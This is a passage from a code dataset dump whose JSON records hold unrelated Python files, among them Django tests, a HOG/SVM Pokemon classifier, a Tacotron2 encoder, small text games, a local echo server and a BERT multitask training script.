obj.unset(key)\n","sub_path":"dynaconf/loaders/env_loader.py","file_name":"env_loader.py","file_ext":"py","file_size_in_byte":2142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"547396175","text":"from ddt import ddt, file_data\nfrom django.test import Client\nfrom django.test import TestCase\nfrom datetime import datetime\nfrom django.utils import timezone\nimport time\n\n\nfrom ..models import User, Tweet\n\n\n@ddt\nclass TestTwitter(TestCase):\n\n def setUp(self):\n self.client = Client()\n User.objects.create(username='user2', email_id='user2@gmail.com', active_status=0)\n User.objects.create(username='user3', email_id='user3@gmail.com', active_status=1)\n User.objects.create(username='user4', email_id='user4@gmail.com', active_status=1)\n Tweet.objects.create(tweet_hashtag=\"#ABC\", tweet_content=\"ABC\", tweeted_at=datetime.now(tz=timezone.utc), tweeted_by=User.objects.get(username='user4'))\n time.sleep(1)\n Tweet.objects.create(tweet_hashtag=\"#ABC\", tweet_content=\"ABC\", tweeted_at=datetime.now(tz=timezone.utc), tweeted_by=User.objects.get(username='user4'))\n time.sleep(1)\n Tweet.objects.create(tweet_hashtag=\"#ABC\", tweet_content=\"ABC\", tweeted_at=datetime.now(tz=timezone.utc), tweeted_by=User.objects.get(username='user4'))\n time.sleep(1)\n Tweet.objects.create(tweet_hashtag=\"#ABC\", tweet_content=\"ABC\", tweeted_at=datetime.now(tz=timezone.utc), tweeted_by=User.objects.get(username='user4'))\n time.sleep(1)\n Tweet.objects.create(tweet_hashtag=\"#ABC\", tweet_content=\"ABC\", tweeted_at=datetime.now(tz=timezone.utc), tweeted_by=User.objects.get(username='user4'))\n\n @file_data('../data/test_data_twitter.json')\n def test_twitter(self, url, method, input, expected_output):\n # Setup Part\n payload = input\n\n # Response Part\n if method == \"GET\":\n response = self.client.get(\n url, payload\n )\n elif method == \"POST\":\n response = self.client.post(\n url, payload\n )\n\n # Assert Part\n\n response_json = response.json()\n self.assertEqual(response.status_code, expected_output['status_code'])\n self.assertEqual(response_json['message'], expected_output['data']['message'])\n self.assertEqual(response_json['error'], expected_output['data']['error'])\n self.assertEqual(response_json['data'], expected_output['data']['data'])\n","sub_path":"twitter_proj/tweet_api/tests/test_ddt_twitter.py","file_name":"test_ddt_twitter.py","file_ext":"py","file_size_in_byte":2266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"141447671","text":"# check triangles\n#\n# a valid triangle is where sum of any two sides > 3rd side\n#\n\ndef is_triangle(side0, side1, side2):\n\n s0 = int(side0)\n s1 = int(side1)\n s2 = int(side2)\n if s0 + s1 > s2 and \\\n s1 + s2 > s0 and \\\n s2 + s0 > s1:\n return True\n\n return False\n\n\n\ndef check_triangles_in_col( col ):\n # now go thru each col\n num_triangles = 0\n for i in range(0,len(col),3):\n if is_triangle(col[i], col[i+1], col[i+2]):\n num_triangles += 1\n return num_triangles\n\n\ndef check_triangles():\n f = open('input.txt', 'r')\n col1 = []\n col2 = []\n col3 = []\n for line in f:\n line = line.rstrip()\n sides = line.split()\n col1.append(sides[0])\n col2.append(sides[1])\n col3.append(sides[2])\n\n triangles = check_triangles_in_col(col1)\n triangles += check_triangles_in_col(col2)\n triangles += check_triangles_in_col(col3)\n\n print(\"Number of triangles %i\" % triangles)\n\n\ncheck_triangles()\n\n","sub_path":"python_lab/day03/check_triangles2.py","file_name":"check_triangles2.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"12672217","text":"from collections import defaultdict\nN = int(input())\n\nSP = defaultdict(list)\nfor i in range(1, N + 1):\n S, P = input().split()\n SP[S].append((int(P), i))\n\nitems = list(SP.items())\nitems.sort()\nfor _, A in items:\n A.sort(reverse=True)\n for _, i in A:\n print(i)\n\n","sub_path":"AtCoder/abc/128b_2.py","file_name":"128b_2.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"325683321","text":"#\n# Copyright (C) 2014-2023 S[&]T, The Netherlands.\n#\n\nfrom __future__ import absolute_import, division, print_function\n\nimport muninn\n\nfrom .utils import create_parser, parse_args_and_run\n\n\ndef run(args):\n with muninn.open(args.archive) as archive:\n print(\"NAMESPACES\")\n for namespace in sorted(archive.namespaces()):\n print(\" %s\" % namespace)\n namespace_schema = archive.namespace_schema(namespace)\n for name in sorted(namespace_schema):\n field = namespace_schema[name]\n field_name = field.name()\n if field.__module__ != 'muninn.schema':\n field_name = '%s.%s' % (field.__module__, field.name())\n optional = namespace_schema.is_optional(name)\n print(\" %s: %s%s\" % (name, field_name, \" (optional)\" if optional else \"\", ))\n\n print(\"\\nPRODUCT TYPES\")\n for product_type in sorted(archive.product_types()):\n print(\" %s\" % product_type)\n\n if archive.remote_backends():\n print(\"\\nREMOTE BACKENDS\")\n for remote_backend in sorted(archive.remote_backends()):\n print(\" %s\" % remote_backend)\n\n return 0\n\n\ndef main():\n parser = create_parser(description=\"Display generic information about the archive.\")\n parser.add_argument(\"archive\", metavar=\"ARCHIVE\", help=\"identifier of the archive to use\")\n return parse_args_and_run(parser, run)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"muninn/tools/info.py","file_name":"info.py","file_ext":"py","file_size_in_byte":1495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"12593822","text":"# Author(s): Kermit Mitchell III, Zeke Hammonds\n# Start Date: 05/06/2019 5:30 PM | Last Editied: 12/15/2020 1:00 PM\n# This code uses the trained Pokedex SVMs to identify the Pokemon in an given image.\n\n# Essential Imports\nimport cv2 as cv # Image processing like HoG\nimport numpy as np # Fast matrix manipulation\nfrom matplotlib import pyplot as plt # Graphing data\nfrom sklearn import svm as SVM # machine learning models\nimport sklearn\nfrom joblib import dump, load # saving and writing PCA/SVM\nimport os # file system access\nimport sys # for debugging and terminal print length\n\n#print('The scikit-learn version is {}.'.format(sklearn.__version__))\n\n## Relevant folder paths for ours SVMS, PCAs, and HOGs\nsvmFolderPath = './SVM/'\npcaFolderPath = './PCA/'\nhogFolderPath = './HOG/'\n\n# A vector of our labels, used below\nlabelVector = [\"pikachu\", \"bulbasaur\", \"charmander\", \"squirtle\", \"ditto\"] \n\n# This is our HOG Descriptor, and will be used for feature extraction\nIMG_SIZE = 224 # the size of our imcoming images\nwinSize = (IMG_SIZE, IMG_SIZE) # same size as images\nblockSize = (IMG_SIZE // 4, IMG_SIZE // 4) # (224/4)=56\nblockStride = (IMG_SIZE // 8, IMG_SIZE // 8) # sliding window processes blocks by cell size\ncellSize = (IMG_SIZE // 8, IMG_SIZE // 8) # same as above ^\nL2HysThreshold = 0.2\nnbins = 9 # angles from 0-180, increments of 20 degrees\n\nhog = cv.HOGDescriptor(winSize, blockSize, blockStride, cellSize, nbins, 1, 4, 0, 0.2, 0)\n\n# Load in the trained Pokedex SVMs\nsvm0 = load(svmFolderPath + 'pikachuSVM.joblib')\nsvm1 = load(svmFolderPath + 'bulbasaurSVM.joblib')\nsvm2 = load(svmFolderPath + 'charmanderSVM.joblib')\nsvm3 = load(svmFolderPath + 'squirtleSVM.joblib')\n\n# Returns the hog-pca matrix based on the input Pokemon\ndef pokePCA(hogMatrix, pokemon):\n PCA_Mean = load(pcaFolderPath + pokemon + 'PCA_Mean.joblib')\n PCA_Eigen = load(pcaFolderPath + pokemon + 'PCA_Eigen.joblib')\n pca = cv.PCAProject(hogMatrix, PCA_Mean, PCA_Eigen)\n return pca\n\n# Enter in the filepath and name of the image, and predicts which Pokemon it is\ndef predictPokemon(testImgURL):\n #testImgURL = \"pikachu_kerem.jpg\"#bulbasaurTestingData[24]\n # ^ replace with the actual test image from camera\n #bulbasaurTestingData[30] <-- if you wanted to test from testing set instead\n\n testImg = cv.imread(testImgURL)\n if testImg is None:\n print(\"Invalid file or incorrect path.\")\n quit()\n testImg = cv.resize(testImg, (IMG_SIZE, IMG_SIZE))\n #cv.imshow(testImgURL, testImg)\n #cv.waitKey(0)\n #cv.destroyAllWindows()\n\n # Run this image through HOG and PCA for each Pokemon\n\n testImgHOG = hog.compute(testImg, winSize)\n testImgHOG = testImgHOG.transpose()\n\n pikachuTestImgHOG = pokePCA(testImgHOG, labelVector[0])\n bulbasaurTestImgHOG = pokePCA(testImgHOG, labelVector[1])\n charmanderTestImgHOG = pokePCA(testImgHOG, labelVector[2])\n squirtleTestImgHOG = pokePCA(testImgHOG, labelVector[3])\n\n scoreScaler = 1 # used to scale the scores for readability\n predictions = np.empty((4, 2)) # the final predictions of all 4 SVMs\n predictions[0][0] = (int)(svm0.predict(pikachuTestImgHOG)[0])\n predictions[0][1] = round((svm0.score_samples(pikachuTestImgHOG))[0], 4) * scoreScaler\n predictions[1][0] = (int)(svm1.predict(bulbasaurTestImgHOG)[0])\n predictions[1][1] = round((svm1.score_samples(bulbasaurTestImgHOG))[0], 4) * scoreScaler\n predictions[2][0] = (int)(svm2.predict(charmanderTestImgHOG)[0])\n predictions[2][1] = 
round((svm2.score_samples(charmanderTestImgHOG))[0], 4) * scoreScaler\n predictions[3][0] = (int)(svm3.predict(squirtleTestImgHOG)[0])\n predictions[3][1] = round((svm3.score_samples(squirtleTestImgHOG))[0], 4) * scoreScaler\n print(predictions)\n\n # Calculate the max prediction score, and select the final result\n currentMaxIndex = -1\n currentMaxValue = sys.float_info.min\n for i in range(predictions.shape[0]):\n if(predictions[i][1] > currentMaxValue):\n currentMaxValue = predictions[i][1]\n currentMaxIndex = i\n\n finalAnswer = labelVector[currentMaxIndex]\n threshold = 1.0 * (10**-2) # Eliminates scores that are too low\n if(currentMaxValue < threshold or currentMaxIndex == -1):\n finalAnswer = \"Ditto\" # this means the testImg was neither class aka inconclusive\n\n #print('Final Prediction:', finalAnswer)\n #cv.imshow(testImgURL, testImg)\n #cv.waitKey(0)\n #cv.destroyAllWindows()\n\n #print(finalAnswer)\n return finalAnswer\n\n# Tests an individual image\nmyImgUrl = input(\"Enter an image (filepath and filename) of Pikachu, Bulbasaur, Charmander, or Squirtle: \")\n#\"Revisions/bulbagrey.png\" # This would be the filename and path\nprint(predictPokemon(myImgUrl))\nmyTestImg = cv.imread(myImgUrl)\ncv.imshow(myImgUrl, myTestImg)\ncv.waitKey(0)\ncv.destroyAllWindows()","sub_path":"pokedex_classify_image.py","file_name":"pokedex_classify_image.py","file_ext":"py","file_size_in_byte":4727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
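The window/block/cell arithmetic in the pokedex script determines the HOG feature-vector length. A standalone sketch of computing a descriptor with the same geometry on a synthetic image (the random image is a stand-in for a real resized photo):

import cv2 as cv
import numpy as np

IMG_SIZE = 224
winSize = (IMG_SIZE, IMG_SIZE)
blockSize = (IMG_SIZE // 4, IMG_SIZE // 4)    # 56x56
blockStride = (IMG_SIZE // 8, IMG_SIZE // 8)  # 28x28
cellSize = (IMG_SIZE // 8, IMG_SIZE // 8)     # 28x28
nbins = 9

hog = cv.HOGDescriptor(winSize, blockSize, blockStride, cellSize, nbins)

# Synthetic 8-bit image standing in for a resized Pokemon photo.
img = np.random.randint(0, 256, (IMG_SIZE, IMG_SIZE, 3), dtype=np.uint8)
features = hog.compute(img)

# Blocks per side: (224 - 56) / 28 + 1 = 7; cells per block: 2x2; 9 bins each,
# so 7 * 7 * 4 * 9 = 1764 values (shape may be (1764,) or (1764, 1) by version).
print(features.size)  # 1764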
+{"seq_id":"538593145","text":"# Copyright (c) 2020, Soohwan Kim. All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport torch.nn as nn\nfrom torch import Tensor\nfrom typing import Optional\nfrom tacotron2.modules import ConvBlock\n\n\nclass Encoder(nn.Module):\n \"\"\"\n Encoder of Tacotron2`s Spectrogram Prediction Network.\n The encoder converts a character sequence into a hidden feature representation which the decoder\n consumes to predict a spectrogram. Default values are those in the paper.\n\n Args:\n vocab_size (int): size of character vocab\n embedding_dim (int): dimension of character embedding layer (default: 512)\n encoder_lstm_dim (int): dimension of rnn hidden state vector (default: 256)\n num_lstm_layers (int): number of rnn layers (default: 1)\n conv_dropout_p (float): dropout probability of convolution layer (default: 0.5)\n num_conv_layers (int): number of convolution layers (default: 3)\n conv_kernel_size (int): size of convolution layer`s kernel (default: 5)\n lstm_bidirectional (bool): if True, becomes bidirectional rnn (default: True)\n device (str): cuda or cpu (default: cuda)\n\n Inputs: inputs, input_lengths\n - **inputs**: list of sequences, whose length is the batch size and within which each sequence is list of tokens\n - **input_lengths**: list of sequence lengths\n\n Returns: output\n - **output**: tensor containing the encoded features of the input character sequences\n \"\"\"\n\n def __init__(\n self,\n vocab_size: int, # size of character vocab\n embedding_dim: int = 512, # dimension of character embedding layer\n encoder_lstm_dim: int = 256, # dimension of lstm hidden state vector\n num_lstm_layers: int = 1, # number of lstm layers\n conv_dropout_p: float = 0.5, # dropout probability of convolution layer\n num_conv_layers: int = 3, # number of convolution layers\n conv_kernel_size: int = 5, # size of convolution layer`s kernel\n lstm_bidirectional: bool = True, # if True, becomes bidirectional lstm\n device: str = 'cuda' # cuda or cpu\n ) -> None:\n super(Encoder, self).__init__()\n self.embedding = nn.Embedding(vocab_size, embedding_dim)\n self. 
conv_layers= nn.Sequential(*[\n ConvBlock(\n embedding_dim,\n embedding_dim,\n kernel_size=conv_kernel_size,\n padding=int((conv_kernel_size - 1) / 2),\n dropout_p=conv_dropout_p\n ) for _ in range(num_conv_layers)\n ])\n self.lstm = nn.LSTM(\n input_size=embedding_dim,\n hidden_size=encoder_lstm_dim,\n num_layers=num_lstm_layers,\n batch_first=True,\n bias=True,\n bidirectional=lstm_bidirectional\n )\n self.device = device\n\n def forward(self, inputs: Tensor, input_lengths: Optional[Tensor] = None) -> Tensor:\n inputs = self.embedding(inputs)\n inputs = inputs.transpose(1, 2)\n\n inputs = self.conv_layers(inputs)\n inputs = inputs.transpose(1, 2)\n\n if input_lengths is not None:\n output = nn.utils.rnn.pack_padded_sequence(inputs, input_lengths, batch_first=True)\n self.lstm.flatten_parameters()\n output, _ = self.lstm(output)\n output, _ = nn.utils.rnn.pad_packed_sequence(output, batch_first=True)\n\n else:\n self.lstm.flatten_parameters()\n output, _ = self.lstm(inputs)\n\n return output\n","sub_path":"tacotron2/encoder.py","file_name":"encoder.py","file_ext":"py","file_size_in_byte":4182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
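Encoder.forward above packs the padded batch before the LSTM so the RNN skips pad timesteps, then unpacks. Here is that round trip in isolation; the sizes are arbitrary, and enforce_sorted=False is used so lengths need not be pre-sorted (the encoder above relies on sorting upstream):

import torch
import torch.nn as nn

batch, max_len, feat, hidden = 3, 5, 8, 6
inputs = torch.randn(batch, max_len, feat)
lengths = torch.tensor([5, 3, 2])  # true (unpadded) length of each sequence

lstm = nn.LSTM(feat, hidden, batch_first=True, bidirectional=True)

# Pack so the LSTM never runs over padding timesteps.
packed = nn.utils.rnn.pack_padded_sequence(
    inputs, lengths, batch_first=True, enforce_sorted=False)
packed_out, _ = lstm(packed)
output, out_lengths = nn.utils.rnn.pad_packed_sequence(packed_out, batch_first=True)

print(output.shape)          # torch.Size([3, 5, 12]); 12 = 2 * hidden (bidirectional)
print(out_lengths.tolist())  # [5, 3, 2]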
+{"seq_id":"350319117","text":"test=0\ndef Jakob():\n print (\"Jakob\")\n\n\ndef Josh():\n print (\"Josh\")\n\ndef Patrick():\n print (\"Patrick\")\n\n \ndef Vish():\n print (\"Vish\") \n\ndef Sharan():\n print (\"Sharan\")\n\ndef Chris():\n pick=0\n print (\"So Yoda is supposed to study but his age has proven that there are better ways!\")\n print (\"\"\"How are you going to get closer to the teacher?:\n 1.Hope that the teacher is a \"Star Wars\" fan.\n 2.Try to use the force and hope for the best.\"\"\")\n \n while pick not in [1,2]:\n pick=int(input(\"Two paths choose you may....:\"))\n \n if pick==1:\n print (\"Ops the teachers seems to be on the dark side....\\n\")\n print (\"\"\"\n 1.Pretend to be a green ugly house elf from Harry Potter and ask for clothes!\n 2.Preting using the force in order to joke with him!\"\"\")\n \n pick=0 \n while pick not in [1,2]:\n pick=int(input(\"Two paths choose you may....:\"))\n\n if pick in [1,2]:\n print (\"The teacher didn't like this and strangled you!\")\n print (\"\"\"\n P.I.R YODA\"\"\")\n test=input(\"\")\n \n elif pick==2:\n print (\"The force didn't work.....The teacher seems to be a Sith!\")\n print (\"\"\"\n 1.Join the dark force\n 2.Confuse him by your inversed random gibberish\"\"\")\n \n pick=0\n while pick not in [1,2]:\n pick=int(input(\"Two paths choose you may....:\"))\n\n if pick in [1,2]:\n print (\"The teacher didn't like this and strangled you!\")\n print (\"\"\"\n P.I.R YODA\"\"\")\n test=input(\"\")\n \n \n \n \n \n \n\n\n\n\n\nCourse=0\nTrait=0\nprint(\"Yoda has arrived on Earth and has decided to attend university.\")\nprint(\"Yoda first has to decide on which course to enrol on.\")\nprint(\"\"\"\n1.Computing\n2.Dance\n3.Aeronotical Engineering\"\"\")\nCourse= int(input(\": \"))\nprint(\"As Yoda maturs reaching the age 103839221821x10^829\")\nprint(\"He has developed some new charactrer traits\")\nprint(\"\"\"\n1. Addictive tendantices\n2. Teachers Pet\"\"\")\nTrait = int(input(\": \"))\nif Course == 1:\n \n if Trait == 1:\n \n Vish()\n\n else:\n \n Chris()\n \n \nif Course == 2:\n \n if Trait == 1:\n \n Josh()\n \n else:\n \n Sharan()\n \nif Course == 3:\n \n if Trait == 1:\n \n Patrick()\n \n else:\n \n Jakob()\n","sub_path":"YodaAtUniChris.py","file_name":"YodaAtUniChris.py","file_ext":"py","file_size_in_byte":2446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"56828048","text":"from headspace.associative import Link\nfrom headspace.associative import PyAssoConfigFlag\n\n\ndef create_example_config():\n cache_deps = [[Link(index=0, prev=True)],\n [Link(index=0, prev=True)],\n [Link(index=1, prev=False),\n Link(index=0, prev=True)]]\n\n indicator_deps = [[Link(index=0, prev=True)], []]\n indicator_cache = [[0], []]\n\n expansion_deps = [[Link(index=1, prev=False)]]\n expansion_indicator = [[1]]\n expansion_cache = [[]]\n\n flags = PyAssoConfigFlag(\n summary='AverageSummary',\n summary_config='',\n value='MaxValueUpdate',\n value_config='',\n cache_deps=cache_deps,\n indicator_cache=indicator_cache,\n indicator_deps=indicator_deps,\n expansion_cache=expansion_cache,\n expansion_deps=expansion_deps,\n expansion_indicator=expansion_indicator)\n\n return flags\n","sub_path":"headspace/tests/example_config.py","file_name":"example_config.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"226065249","text":"import socket\nfrom _thread import *\n\n# 쓰레드에서 실행되는 코드입니다.\n# 접속한 클라이언트마다 새로운 쓰레드가 생성되어 통신을 하게 됩니다.\ndef threaded(client_socket, addr):\n print('Connected by :', addr[0], ':', addr[1])\n\n # 클라이언트가 접속을 끊을 때 까지 반복합니다.\n while True:\n\n try:\n # 데이터가 수신되면 클라이언트에 다시 전송합니다.(에코)\n data = client_socket.recv(1024)\n\n if not data:\n print('Disconnected by ' + addr[0], ':', addr[1])\n break\n\n decoded_data = str(data.decode())\n print('Received from ' + addr[0], ':', addr[1], data.decode())\n\n if (\"2@\" in decoded_data) :\n if (\"강아지\" in decoded_data):\n client_socket.send(\"0@\".encode())\n else :\n client_socket.send(\"2@14@강아지\".encode())\n\n\n elif (\"1@\" in decoded_data):\n if \"1호선\" in decoded_data:\n client_socket.send(\"1@형진역@주홍역@효상역@영욱역@강아지@고양이@사자\".encode())\n elif \"2호선\" in decoded_data:\n client_socket.send(\"1@애플역@과자역@사과역@등등역@하이염\".encode())\n else :\n client_socket.send(\"1@��성역@가방역@충전기@역우역@우웩염\".encode())\n\n\n except ConnectionResetError as e:\n\n print('Disconnected by ' + addr[0], ':', addr[1])\n break\n\n client_socket.close()\n\n\nHOST = '127.0.0.1'\nPORT = 9997\n\nserver_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nserver_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\nserver_socket.bind((HOST, PORT))\nserver_socket.listen()\n\nprint('server start')\n\n# 클라이언트가 접속하면 accept 함수에서 새로운 소켓을 리턴합니다.\n# 새로운 쓰레드에서 해당 소켓을 사용하여 통신을 하게 됩니다.\nwhile True:\n print('wait')\n\n client_socket, addr = server_socket.accept()\n start_new_thread(threaded, (client_socket, addr))\n\nserver_socket.close()","sub_path":"python-temp-echo-server/echo-server.py","file_name":"echo-server.py","file_ext":"py","file_size_in_byte":2194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"132359250","text":"# -*- coding: utf-8 -*-\n\nfrom sys import exit\n\ndef gold_room():\n \"\"\"it requires you to input any number containing 0 or 1 and you should enter less than 50 in order to win the game\"\"\"\n print(\"황금으로 가득 찬 방입니다. 얼마나 가져갈까요?\")\n \n try: \n next = int(input(\">\")) \n if how_much < 50:\n print(\"좋아, 욕심부리지 않는군요. 당신이 이겼습니다!\")\n exit(0)\n else:\n dead(\"욕심쟁이 얼간이 같으니!\")\n \n except ValueError:\n dead(\"인간이여, 숫자 쓰는 법부터 배우세요.\")\n # quit the function with the message? yes it does.\n\n#def gold_room():\n# \"\"\"it requires you to input any number containing 0 or 1 and you #should enter less than 50 in order to win the game\"\"\"\n# print(\"황금으로 가득 찬 방입니다. 얼마나 가져갈까요?\")\n \n# next = input(\">\")\n# if \"0\",\"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\", \"1\" in next :\n# how_much = int(next)\n# else:\n# dead(\"인간이여, 숫자 쓰는 법부터 배우세요.\")\n# # quit the function with the message? yes it does.\n \n# if how_much < 50:\n# print(\"좋아, 욕심부리지 않는군요. 당신이 이겼습니다!\")\n# exit(0)\n# else:\n# dead(\"욕심쟁이 얼간이 같으니!\")\n \ndef bear_room():\n print(\"Here is a bear\")\n print(\"with large amount of honey\")\n print(\"There is another fat bear in front of the door\")\n print(\"How could you move the bears?\")\n bear_moved = False\n \n while True:\n next = input(\"(꿀 뺏기/ 곰 놀리기/ 문 열기)>\")\n \n if next == \"꿀 뺏기\":\n dead(\"The bear look at you and chop your cheek badly\")\n elif next == \"곰 놀리기\" and not bear_moved:\n print(\"The bear get away from the door. You may leave safely\")\n bear_moved = True\n elif next == \"곰 놀리기\" and bear_moved:\n dead(\"You just exasperated the bear and it ate your leg away\")\n # Executed when you keep \"곰 놀리기\" twice.\n elif next == \"문 열기\" and bear_moved:\n gold_room()\n else:\n print(\"무슨 말인지 모르겠네요. 선택지 중에 고르세요\")\n \ndef cthulhu_room():\n print(\"여기에서는 대악마 크툴루를 봅니다.\")\n print(\"He, it, anyway gazes at you and you are getting crazy\")\n print(\"Run away, or I would tear your head apart\")\n \n next = input(\"(달아나기/ 먹기)>\")\n \n if \"달아나기\" in next:\n start()\n elif \"먹기\" in next:\n dead(\"음, 맛이 좋군요!\")\n else:\n cthulhu_room()\n \n\ndef dead(why):\n \"\"\"It prints out the given message and turn off the game\"\"\"\n print(why, \"ㅋ\")\n exit(0)\n# Shouldn't it be defined previously, preceding at least 'gold room'?\n\n\ndef start():\n print(\"You're in dark, dark room.\")\n print(\"At right side and left side are doors\")\n print(\"Which one would you select?\")\n \n next = input(\"(왼쪽/ 오른쪽)>\")\n \n if next == \"왼쪽\":\n bear_room()\n elif next == \"오른쪽\":\n cthulhu_room()\n else:\n dead(\"문 주위에서 맴돌기만하다 굶어 죽었습니다.\")\n \n#start()\ngold_room()\n\n# exit()프로그램 강재종료/ 인자에 따라서 오류여부/종류 특정가능","sub_path":"python/LearnPythonTheHardWay/129_ex35_usoufo12.py","file_name":"129_ex35_usoufo12.py","file_ext":"py","file_size_in_byte":3415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"380441962","text":"import transformers\r\nfrom transformers import BertTokenizer, BertModel, AdamW, get_linear_schedule_with_warmup\r\nimport random\r\nimport torch\r\nfrom torch.nn import CrossEntropyLoss\r\nfrom torch.utils.data import DataLoader, RandomSampler, SequentialSampler, WeightedRandomSampler\r\nimport time\r\nimport datetime\r\nimport numpy as np\r\nfrom PointerModel import PointerBert\r\nfrom preprocess_glue import *\r\nimport os\r\nfrom nlp import load_dataset\r\nimport tensorflow as tf\r\nfrom DynamicDataLoader import InstanceSampler\r\n\r\nflags = tf.compat.v1.app.flags\r\nFLAGS = flags.FLAGS\r\nflags.DEFINE_float('learning_rate', 3e-5, 'Initial learning rate.')\r\nflags.DEFINE_float('epsilon', 1e-8, 'epsilon.')\r\nflags.DEFINE_integer('num_epochs', 5, 'Number of epochs when training.')\r\nflags.DEFINE_integer('batch_size', 32, 'Size of each batch. Default is 32.')\r\nflags.DEFINE_boolean('dynamic_sampling', False, 'Use dynamic sampling?')\r\n\r\nNEW_SPEC_TOKENS = ['[ACCEPTABLE]', '[UNACCEPTABLE]', \r\n '[POSITIVE]', '[NEGATIVE]', \r\n '[PARAPHRASE]', '[NOT_PARAPHRASE]', \r\n '[SIMILAR]', '[NOT_SIMILAR]',\r\n '[ENTAILMENT]', '[NEUTRAL]', '[CONTRADICTION]',\r\n '[ANSWERABLE]', '[NOT_ANSWERABLE]',\r\n '[REFERENT]', '[NOT_REFERENT]']\r\n\r\nsingle_accuracy = {'cola' : 0.831,\r\n 'sst2' : 0.924,\r\n 'mrpc' : 0.869,\r\n 'qqp' : 0.911,\r\n 'mnli' : 0.839,\r\n 'rte' : 0.799,\r\n 'qnli' : 0.911,\r\n 'wnli' : 0.565\r\n }\r\n\r\n# Function to calculate the accuracy of our predictions vs labels\r\ndef flat_accuracy(preds, labels):\r\n pred_flat = np.argmax(preds, axis=1).flatten()\r\n labels_flat = labels.flatten()\r\n return np.sum(pred_flat == labels_flat) / len(labels_flat)\r\n\r\n#\r\ndef format_time(elapsed):\r\n '''\r\n Takes a time in seconds and returns a string hh:mm:ss\r\n '''\r\n # Round to the nearest second.\r\n elapsed_rounded = int(round((elapsed)))\r\n \r\n # Format as hh:mm:ss\r\n return str(datetime.timedelta(seconds=elapsed_rounded))\r\n\r\n# TODO : dddd\r\n# =======================================================\r\n# Get positive weights from accuracies(or other metrics) \r\n# by getting the differentials of those with those of\r\n# single-task models. Add some positive number \r\n# if any of the scores are negative to make them positive.\r\n# ========================================================\r\ndef get_scores_from_acc(cola=None, sst2=None, mrpc=None, qqp=None, mnli=None, rte=None, qnli=None, wnli=None):\r\n cola_score = single_accuracy['cola'] - cola + 0.2\r\n sst2_score = single_accuracy['sst2'] - sst2 + 0.2\r\n mrpc_score = single_accuracy['mrpc'] - mrpc + 0.2\r\n qqp_score = single_accuracy['qqp'] - qqp + 0.2\r\n mnli_score = single_accuracy['mnli'] - mnli + 0.2\r\n rte_score = single_accuracy['rte'] - rte + 0.2\r\n qnli_score = single_accuracy['qnli'] - qnli + 0.2\r\n wnli_score = single_accuracy['wnli'] - wnli + 0.2 \r\n return cola_score, sst2_score, mrpc_score, qqp_score, mnli_score, rte_score, qnli_score, wnli_score\r\n\r\n\r\nif __name__ == \"__main__\":\r\n if torch.cuda.is_available(): \r\n device = torch.device(\"cuda\")\r\n print('There are %d GPU(s) available.' 
% torch.cuda.device_count())\r\n print('We will use the GPU:', torch.cuda.get_device_name(0))\r\n else:\r\n print('No GPU available, using the CPU instead.')\r\n device = torch.device(\"cpu\")\r\n\r\n # ========================================================\r\n # Call appropriate tokenizer of the Bert model.\r\n # If there is a saved version, load it.\r\n # If not, load a new pretrained BertTokenizer with \r\n # special tokens addded. Then save it.\r\n # ========================================================\r\n if os.path.isdir('./tokenizer/custom-tok'): # Check if we already have a customzied tokenizer.\r\n tokenizer = BertTokenizer.from_pretrained('custom-tok') # If we do, load it. \r\n else:\r\n tokenizer = BertTokenizer.from_pretrained('bert-base-uncased', do_lower_case=True, additional_special_tokens=NEW_SPEC_TOKENS)\r\n tokenizer.save_pretrained('./tokenizer/custom_tok')\r\n\r\n # =========================================================\r\n # Call Pointer Bert model that uses Bert as its embedding\r\n # and has an extra dot-producting layer that \r\n # finds the right answer among the added task tokens.\r\n # =========================================================\r\n\r\n bert = BertModel.from_pretrained('bert-base-uncased')\r\n bert.resize_token_embeddings(len(tokenizer))\r\n model = PointerBert(bert)\r\n\r\n if torch.cuda.is_available():\r\n model.cuda()\r\n\r\n batch_size = FLAGS.batch_size\r\n\r\n cola_train_dataset, cola_val_dataset = get_small_train_val_datasets('cola')\r\n sst2_train_dataset, sst2_val_dataset = get_small_train_val_datasets('sst2')\r\n mrpc_train_dataset, mrpc_val_dataset = get_small_train_val_datasets('mrpc')\r\n qqp_train_dataset, qqp_val_dataset = get_small_train_val_datasets('qqp')\r\n mnli_train_dataset, mnli_val_dataset = get_small_train_val_datasets('mnli')\r\n rte_train_dataset, rte_val_dataset = get_small_train_val_datasets('rte')\r\n qnli_train_dataset, qnli_val_dataset = get_small_train_val_datasets('qnli')\r\n wnli_train_dataset, wnli_val_dataset = get_small_train_val_datasets('wnli')\r\n\r\n cola_train_dataset = cola_train_dataset.map(make_encoder('cola', tokenizer))\r\n cola_val_dataset = cola_val_dataset.map(make_encoder('cola', 